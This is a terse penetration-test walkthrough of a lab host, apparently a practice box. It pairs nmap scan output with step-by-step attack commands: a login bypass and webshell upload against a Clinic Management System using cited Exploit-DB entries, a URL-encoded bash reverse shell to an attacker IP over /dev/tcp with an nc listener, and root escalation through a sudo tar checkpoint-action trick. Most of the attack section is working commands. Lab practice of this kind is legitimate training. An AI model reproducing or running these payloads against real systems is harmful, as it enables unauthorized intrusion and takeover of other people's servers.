.

101
----------------------

-scan with nmap/masscan for all ports

21/tcp open ftp vsftpd 3.0.3

|ftp-anon: got code 500 "OOPS: vsftpd: refusing to run with writable root inside chroot()".
22/tcp open ssh OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey:
| 3072 5c:de:3d:4e:d1:65:59:e5:e4:75:08:d9:72:0a:ba:01 (RSA)
| 256 70:35:47:ae:6d:f9:64:7b:e5:84:da:a8:bd:18:bd:5f (ECDSA)
| 256 bc:59:39:14:9a:9f:6e:da:4a:37:3c:80:80:f0:a7:9d (ED25519)
80/tcp open http Apache httpd 2.4.43 ((Fedora) OpenSSL/1.1.1g)
| http-git:
| 192.168.x.101:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Remotes:
|_ https://github.com/mikepfeiffer/simple-php-app
|_http-server-header: Apache/2.4.43 (Fedora) OpenSSL/1.1.1g
|http-title: PHP Application - AWS Elastic Beanstalk
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
139/tcp open netbios-ssn Samba smbd 4.6.2
443/tcp open ssl/http Apache httpd 2.4.43 ((Fedora) OpenSSL/1.1.1g)
| http-git:
| 192.168.x.101:443/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Remotes:
|_ https://github.com/mikepfeiffer/simple-php-app
|_http-server-header: Apache/2.4.43 (Fedora) OpenSSL/1.1.1g
|_http-title: PHP Application - AWS Elastic Beanstalk
| ssl-cert: Subject: commonName=hector/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:hector
| Not valid before: 2020-06-26T18:22:08
|_Not valid after: 2021-07-01T20:02:08
|ssl-date: TLS randomness does not represent time
| tls-alpn:
| http/1.1
445/tcp open netbios-ssn Samba smbd 4.6.2
3306/tcp open mysql?
| fingerprint-strings:
| JavaRMI, LDAPBindReq, LPDString, NULL, X11Probe, giop, ms-sql-s:
| Host '192.168.X.X' is not allowed to connect to this MariaDB server
7080/tcp open http Apache httpd 2.4.43 ((Fedora) OpenSSL/1.1.1g)
| http-cookie-flags:
| /:
| PHPSESSID:
| httponly flag not set
|_http-server-header: Apache/2.4.43 (Fedora) OpenSSL/1.1.1g
| http-title: Admin Panel
|_Requested resource was login.php
8080/tcp open http Apache Tomcat 9.0.39
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.39
1 service unrecognized despite returning data. If you know the service/v

----------------------------------------------------------------------------------

-port 7080,

-go to login.php, you will see this login page.

Actually, it is Clinic Management System.

https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-
code.html
Read Exploits carefully

Exploit to bypass login : https://www.exploit-db.com/exploits/48538

-use burp (Community Version Only) to bypass login

exploit to RCE : https://www.exploit-db.com/exploits/48544

-http://192.168.X.101:7080/manage_website.php upload webshell.php
-exec at uploadImage/Logo

-catch rev shell http://192.168.X.101:7080/uploadImage/Logo/webshell.php?cmd=bash%20-i%3E

%26%20/dev/tcp/192.168.X.X/445%200%3E%261

(change IP address and lport should be 445)

nc -nvlp 445

-run /usr/bin/bash -p

We need to edit backup.sh to get sammy shell.

When we get sammy shell,

sudo -l or cat /etc/sudoers

-and use gtfobins to priv sec

sudo /usr/bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/usr/bin/bash

#ROOT